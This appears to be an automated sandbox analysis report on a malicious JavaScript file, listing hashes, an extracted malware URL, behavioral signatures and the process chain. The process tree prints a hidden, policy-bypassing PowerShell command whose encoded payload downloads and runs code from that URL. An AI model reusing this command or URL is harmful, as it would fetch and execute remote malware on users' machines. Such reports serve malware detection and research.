Analysis
-
max time kernel
119s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
04/01/2024, 01:19
Static task
static1
Behavioral task
behavioral1
Sample
3f88ee0d8ddc4cf072ca0d20faf3e991.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
3f88ee0d8ddc4cf072ca0d20faf3e991.js
Resource
win10v2004-20231215-en
General
-
Target
3f88ee0d8ddc4cf072ca0d20faf3e991.js
-
Size
94KB
-
MD5
3f88ee0d8ddc4cf072ca0d20faf3e991
-
SHA1
7ae1672b470c71c99268e8e6f59d1838797f531d
-
SHA256
f205d469dd98eea2095573eea1e457b4c49cc0b1cf19fc73c624252eff88e63d
-
SHA512
8c01ad627f557ab98b7fbacc5d1457587ee192687eb0095aef2b65434735b23dd18360ccdf7d2f71287d2cb38ba754c7d2736ae22923dc3d8417b04ebdd3a18f
-
SSDEEP
1536:59Ry98guHVBqqg2bcruayUHmLKeZaMU7GwbWBPwVGWl9SZ8kV8Gp/5bzIEN4t/oW:59Ry98guHVBqqg2bcruzUHmLKeMMU7Gc
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2804 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2804 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2804 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1352 wrote to memory of 2336 1352 wscript.exe 28 PID 1352 wrote to memory of 2336 1352 wscript.exe 28 PID 1352 wrote to memory of 2336 1352 wscript.exe 28 PID 2336 wrote to memory of 2804 2336 cmd.exe 30 PID 2336 wrote to memory of 2804 2336 cmd.exe 30 PID 2336 wrote to memory of 2804 2336 cmd.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\3f88ee0d8ddc4cf072ca0d20faf3e991.js1⤵
- Suspicious use of WriteProcessMemory
PID:1352 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-